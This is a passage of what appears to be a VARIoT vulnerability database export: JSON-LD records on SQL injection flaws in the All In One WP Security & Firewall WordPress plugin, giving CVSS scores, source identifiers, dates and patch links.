            "id": "JVNDB-2014-004988"
          },
          {
            "date": "2014-09-25T15:32:27",
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "date": "2014-10-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "date": "2014-10-02T14:55:04.823000",
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "date": "2014-09-24T00:00:00",
            "db": "BID",
            "id": "70150"
          },
          {
            "date": "2014-10-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "date": "2014-10-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  All In One WP Security \u0026 Firewall In the plugin  SQL Injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "sql injection",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          }
        ],
        "trust": 0.7
      }
    }

    VAR-201908-1072

    Vulnerability from variot - Updated: 2024-11-23 23:08

    The all-in-one-wp-security-and-firewall plugin before 4.0.9 for WordPress has multiple SQL injection issues. WordPress for all-in-one-wp-security-and-firewall Plug-ins include SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The vulnerability stems from the lack of verification of externally input SQL statements in database-based applications. Attackers can exploit this vulnerability to execute illegal SQL commands

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1072",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.0.9"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.0.9"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          }
        ]
      },
      "cve": "CVE-2016-10887",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2016-10887",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-89708",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2016-10887",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10887",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10887",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-1056",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89708",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.0.9 for WordPress has multiple SQL injection issues. WordPress for all-in-one-wp-security-and-firewall Plug-ins include SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The vulnerability stems from the lack of verification of externally input SQL statements in database-based applications. Attackers can exploit this vulnerability to execute illegal SQL commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10887",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89708",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "id": "VAR-201908-1072",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:08:17.015000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Plugin SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96733"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10887"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10887"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "date": "2019-08-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "date": "2019-08-14T16:15:11.957000",
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "date": "2019-08-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "date": "2024-11-21T02:44:59.587000",
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall In the plugin  SQL Injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1219

    Vulnerability from variot - Updated: 2024-11-23 23:08

    The all-in-one-wp-security-and-firewall plugin before 3.9.1 for WordPress has multiple SQL injection issues. WordPress for all-in-one-wp-security-and-firewall Plug-ins include SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The vulnerability stems from the lack of verification of externally input SQL statements in database-based applications. Attackers can exploit this vulnerability to execute illegal SQL commands

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1219",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "3.9.1"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "3.9.1"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          }
        ]
      },
      "cve": "CVE-2015-9310",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2015-9310",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-87271",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2015-9310",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-9310",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-9310",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-1047",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-87271",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 3.9.1 for WordPress has multiple SQL injection issues. WordPress for all-in-one-wp-security-and-firewall Plug-ins include SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The vulnerability stems from the lack of verification of externally input SQL statements in database-based applications. Attackers can exploit this vulnerability to execute illegal SQL commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-9310",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-87271",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "id": "VAR-201908-1219",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:08:16.883000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Plugin SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96724"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9310"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-9310"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "date": "2019-08-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "date": "2019-08-14T16:15:11.377000",
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "date": "2019-08-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "date": "2024-11-21T02:40:18.830000",
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall In the plugin  SQL Injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
